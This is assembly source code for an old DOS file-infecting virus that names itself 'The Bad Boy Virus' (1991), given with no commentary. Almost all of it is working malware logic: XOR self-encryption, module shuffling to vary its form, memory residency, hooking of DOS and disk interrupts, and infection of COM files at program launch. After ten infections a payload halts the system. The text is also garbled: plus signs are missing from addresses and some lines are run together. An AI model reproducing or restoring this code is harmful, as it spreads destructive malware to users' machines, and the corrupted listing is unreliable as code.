Code segment
Assume CS: Code, DS: Code
.radix 16
ORG 100
Start:
Push Word PTR CS: [Table 2]
Push CS
POP DS
JMP Word PTR CS: [TABLE]; Go to Module 1
Curofs dw?
Files DB 0; Number of Infected Files from this Copy
FSIZE DW 2; SIZE OF INFECTED FILE
FTIME DW?
FDATE DW?
STDINT21 DD?
Oldint13 DD?
Oldint21 DD?
Oldint24 DD?
; ------------- Table with Module Parameters --------------------
TABLE:
DW Offset False_Mod_1; 00
DW Offset MOD_2; 02
DW Offset Mod_3; 04
DW Offset MOD_4; 06; Offset Modules
DW offset mod_5; 08
DW Offset MOD_6; 0A
DW Offset Mod_7; 0C
DW Offset MOD_8; 0E
DW Offset Mod_2 - Offset MOD_1; 10
DW Offset Mod_3 - Offset MOD_2; 12
DW Offset Mod_4 - Offset MOD_3; 14
DW Offset Mod_5 - Offset MOD_4; 16
DW Offset Mod_6 - Offset MOD_5; 18; Size Modules
DW Offset Mod_7 - Offset MOD_6; 1A
DW Offset MOD_8 - Offset MOD_7; 1C
DW Offset MyEnd - Offset MOD_8; 1E
; ------------- Module - 1 - CODER / DECODER ----------------------
MOD_1:
MOV BX, Offset Table 2; First Module to Working (Module 2)
MOV CX, 6; Number of Modules to Working
MOD_1_LP1:
CMP BX, Offset Table 0A
JNE MOD_1_CONT
Add bx, 2
MOD_1_CONT:
Push bx
PUSH CX
MOV AX, [BX]; AX - Offset Module
MOV CX, [BX 10]; CX - SIZE OF MODULE
MOV BX, AX
MOD_1_LP2:
XOR BYTE PTR [BX], Al
Inc BX
Loop mod_1_lp2
POP CX
POP BX
Add bx, 2
LOOP MOD_1_LP1
RET
; ------------- Module - 2 - Mutation To Memory -----------------
MOD_2:
; INSTALATION CHECK
MOV ES, CS: [2]; Memory Size
MOV Di, 100
MOV Si, 100
MOV CX, 0BH
REPE CMPSB
JNE MOD_2_INSTALL; JUMP IF NOT INSTALL
JMP Word PTR CS: [Table 06]; if Install, Jump To Module 4
MOD_2_INSTALL:
; INSTALATION
MOV AX, CS
Dec AX
MOV DS, AX
CMP BYTE PTR DS: [0], 'Z'
JE MOD_2_CONT
JMP Word PTR CS: [Table 6]; if NO Last MCB - Go to MOD4MOD_2_CONT:
Sub Word PTR DS: [3], 0C0
MOV AX, ES
SUB AX, 0C0
Mov ES, AX
Mov Word PTR DS: [12], AX; Decrement Memory Size with 2K
Push CS
POP DS
MOD_2_MUT:
MOV BYTE PTR CS: FILES, 0
MOV Di, 100
MOV CX, Offset MOD_1-100
MOV Si, 100
Rep Movsb; Write Table to New Memory
MOV BX, Word PTR CS: [Table]
Add bx, offset mod_1_lp2-offset mod_1 1
XOR BYTE PTR [BX], 18; Change Code Method
MOV CX, 8
Mov Word Ptr Curofs, Offset MOD_1
MOD_2_LP1:
PUSH CX
Call mod_2_rnd; Generate Random Module Addres
Push bx; addres in table returned from mod_2_rnd
MOV AX, [BX]; Offset Module
Push AX
Add BX, 10
MOV CX, [BX]; Length of Module
POP Si
POP BX
XCHG DI, CUROFS
Mov Word PTR ES: [BX], DI; Change Module Offset In Table
Rep Movsb; Copy Module To New Memory
XCHG DI, CUROFS; Change Current Offset in New Memory
MOV AX, 8000
Or Word PTR [BX], AX; Mark Module - Used
POP CX
LOOP MOD_2_LP1
MOV CL, 8
NOT AX
MOV BX, Offset Table
MOD_2_LP2:
And Word PTR [BX], AX; Unmark All Modules
Add bx, 2
LOOP MOD_2_LP2
JMP Word PTR CS: [Table 4]; Go to Module 3
MOD_2_RND:
PUSH CX
Push ES
XOR CX, CX
MOV ES, CX
MOD_2_LP3:
MOV BX, ES: [46C]
DB 81, 0E3, 07, 00; And BX, 7
SHL BX, 1
Add bx, Offset Table
Test [bx], 8000
JNZ MOD_2_LP3
POP ES
POP CX
RET
; ------------- Module - 3 - SET Interrupt Vector ---------------
MOD_3:
XOR AX, AX
MOV DS, AX
MOV AX, DS: [4 * 21]
Mov Word PTR ES: [Oldint21], AX
MOV AX, DS: [4 * 21 2]
MOV Word PTR ES: [Oldint 21 2], AX
Mov Ah, 30
Int 21
CMP AX, 1E03
JNE MOD_3_GETVEC
Mov Word PTR ES: [stdint21], 1460
MOV AX, 1203
Push DS
INT 2F
Mov Word PTR ES: [stdint21 2], DS
POP DS
JMP MOD_3_SETVEC
MOD_3_GETVEC:
MOV AX, DS: [4 * 21]
Mov Word PTR ES: [stdint21], AX
MOV AX, DS: [4 * 21 2] MOV Word PTR ES: [stdint21 2], AX
MOD_3_SETVEC:
CLI
MOV AX, Word PTR ES: [Table 0C]
MOV DS: [4 * 21], AX
MOV AX, ES
MOV DS: [4 * 21 2], AX
STI
MOV CX, ES
MOV AH, 13;
INT 2F;
Push ES;
MOV ES, CX;
Mov Word Ptr Es: [Oldint13], DX; Get Standart INT13 Addres
MOV Word PTR ES: [Oldint13 2], DS;
POP ES;
INT 2F;
JMP Word PTR CS: [Table 06]; Go to Module 4
; ------------- Module - 4 - Restore Old Program Code & Start ----
MOD_4:
Push CS
Push CS
POP DS
POP ES
Mov Si, Word PTR CS: [Table 06]
Add Si, Offset MOD_4_CONT - OFFSET MOD_4
MOV DI, CS: FSIZE
Add Di, Offset MyEnd 1
Push di
MOV CX, OFFSET MOD_5 - Offset MOD_4_CONT
CLD
REP MOVSB
RET
MOD_4_CONT:
Mov Si, CS: fsize
Add Si, 100
CMP Si, Offset MyEnd 1
JNC MOD_4_CNT
MOV Si, Offset MyEnd 1
MOD_4_CNT:
MOV Di, 100
MOV CX, Offset MyEnd-100
REP MOVSB
MOV AX, 100;
Push ax; JMP 100
Ret;
; ------------- Module - 5 - Special Program ---------------------
MOD_5:
MOV AH, 9
MOV DX, Word PTR [Table 8]
Add dx, offset msg-offset mod_5
Push CS
POP DS
Int 21
CLI
HLT
MSG DB 0DH, 0A, 'The Bad Boy Halt Your System ...', 7, 7, '$'
; ------------- Module - 6 - INT 24 Header -----------------------
MOD_6:
MOV Al, 3
Iret
DB 'The Bad Boy Virus, CopyRight (C) 1991.', 0
; ------------- Module - 7 - INT 21 Header -----------------------
MOD_7:
Push bx
Push Si
Push di
Push ES
Push AX
CMP AX, 4B00
JE MOD_7_BEGIN
JMP MOD_7_EXIT
MOD_7_BEGIN:
Push DS
PUSH CS;
POP ES;
XOR AX, AX;
MOV DS, AX;
MOV Si, 4 * 24;
MOV DI, OFFSET OLDINT24;
Movsw; Change Int24 Vector
Movsw;
MOV AX, Word PTR CS: [Table 0A];
CLI;
MOV DS: [4 * 24], AX;
MOV AX, CS;
MOV DS: [4 * 24 2], AX;
STI
POP DS
MOV AX, 3D00; PUSHF;
Call CS: Oldint21;
JC MOD_7_EX; Open, Infect, Close File
MOV BX, AX;
MOD_7_INFECT:;
Call Word PTR CS: [Table 0e];
Pushf
Mov AH, 3E;
Pushf;
Call CS: Oldint21;
POPF
JC MOD_7_EX
Push DS;
CLI;
XOR AX, AX;
MOV DS, AX;
MOV AX, Word PTR CS: [Oldint13];
XCHG AX, Word PTR DS: [4 * 13];
Mov Word PTR CS: [Oldint13], AX; Exchange INT13 VECTORS
MOV AX, Word PTR CS: [Oldint13 2];
XCHG AX, Word PTR DS: [4 * 13 2];
MOV Word PTR CS: [Oldint13 2], AX;
STI;
POP DS;
MOD_7_EX:
Push DS;
XOR AX, AX;
MOV DS, AX;
MOV AX, Word PTR CS: Oldint 24;
MOV DS: [4 * 24], AX;
MOV AX, Word PTR CS: Oldint24 2; Restore Int24 Vector
MOV DS: [4 * 24 2], AX;
POP DS;
MOD_7_EXIT:
POP AX
POP ES
POP DI
POP Si
POP BX
JMP CS: Oldint 21
; ------------- Module - 8 - Infecting (Bx - File Handle) --------
MOD_8:
PUSH CX
Push dx
Push DS
Push ES
Push di
Push BP
Push bx
MOV AX, 1220
INT 2F
MOV BL, ES: [DI]
XOR BH, BH
MOV AX, 1216
INT 2F
POP BX
MOV AX, Word PTR ES: [Di 11]
CMP AX, 0F000
JC MOD_8_C
JMP MOD_8_EXIT
MOD_8_C:
MOV Word PTR ES: [DI 2], 2; Open Mode - R / W
MOV AX, ES: [DI 11]
MOV CS: Fsize, Ax; Save File Size
MOV AX, Word PTR ES: [DI 0DH];
Mov Word PTR CS: [FTIME], AX; Save File Date / Time
MOV AX, Word PTR ES: [DI 0F];
MOV Word PTR CS: [FDATE], AX;
PUSH CS;
POP DS;
MOV DX, OFFSET MYEND 1;
MOV CX, Offset MyEnd-100; Read First Bytes
MOV AH, 3F;
Pushf
Call CS: Oldint21
JNC MOD_8_CNT
JMP MOD_8_EXIT
MOD_8_CNT:
MOV BP, AX; AX - BYTES READ
MOV Si, DX
MOV AX, 'MZ'
CMP AX, Word PTR DS: [Si]
JNE MOD_8_NXTCHK
JMP MOD_8_EXIT
MOD_8_NXTCHK:
XCHG AH, Al
CMP AX, DS: [Si]
JNE MOD_8_CNT2
JMP MOD_8_EXIT
MOD_8_CNT2:
Push ES
Push di
PUSH CS;
POP ES;
MOV Si, 100; MOV Di, DX; Check for Infected File
MOV CX, 0BH;
REPE CMPSB;
POP DI
POP ES
JNE MOD_8_CNT1;
JMP MOD_8_EXIT
MOD_8_CNT1:
MOV Word PTR ES: [DI 15], 0; FP: = 0
Push ES
Push di
MOV Si, Word PTR CS: [Table 0e]
Add Si, Offset MOD_8_CONT - OFFSET MOD_8
XOR DI, DI
Push CS
POP ES
MOV CX, OFFSET MOD_8_CONT_END - OFFSET MOD_8_CONT
CLD
REP MOVSB
POP DI
POP ES
MOV Si, Word PTR CS: [Table 0e]
Add Si, Offset MOD_8_CONT_END - OFFSET MOD_8
Push Si
XOR Si, Si
Push Si
Push DS;
CLI;
XOR AX, AX;
MOV DS, AX;
MOV AX, Word PTR CS: [Oldint13];
XCHG AX, Word PTR DS: [4 * 13];
Mov Word PTR CS: [Oldint13], AX;
MOV AX, Word PTR CS: [Oldint13 2]; Exchange INT13 VECTORS
XCHG AX, Word PTR DS: [4 * 13 2];
MOV Word PTR CS: [Oldint13 2], AX;
STI;
POP DS;
RET
MOD_8_CONT:
Push bx
Call Word PTR CS: [TABLE]; CODE VIRUS
POP BX
MOV DX, 100;
Mov AH, 40; Write Code in Begin
MOV CX, Offset MyEnd-0FF
Pushf;
Call CS: stdint21;
Pushf
Push bx
Call Word PTR CS: [Table]; Decode Virus
POP BX
POPF
JNC MOD_8_CONT1
POP AX
MOV AX, Word PTR CS: [Table 0e]
Add Ax, Offset MOD_8_EXT - Offset MOD_8
Push AX
RET
MOD_8_CONT1:
Mov AX, ES: [DI 11]; FP: = End of File
MOV Word PTR ES: [DI 15], AX;
MOV DX, Offset MyEnd 1
MOV CX, BP; BP - Files Read
MOV AH, 40;
Pushf;
Call CS: stdint21; write in end of file
RET
MOD_8_CONT_END:
MOV AX, 5701;
MOV CX, CS: ftime;
MOV DX, CS: Fdate; Restore File Date / Time
Pushf;
Call CS: Oldint21;
INC CS: Files
CMP CS: FILES, 0A
JNE MOD_8_EXT
Call Word PTR CS: [Table 8]
JMP Short MOD_8_EXT
MOD_8_EXIT:
STC
JMP Short MOD_8_EX
MOD_8_EXT:
CLC
MOD_8_EX:
POP BP
POP DI
POP ES
POP DS
POP DX
POP CX
RET
; ------------------------------------------------- -------------- MYEND DB 0
INT 20; Code of Infected File
FALSE_MOD_1:
Mov Word PTR CS: [Table], Offset MOD_1
RET
Code ends
End Start
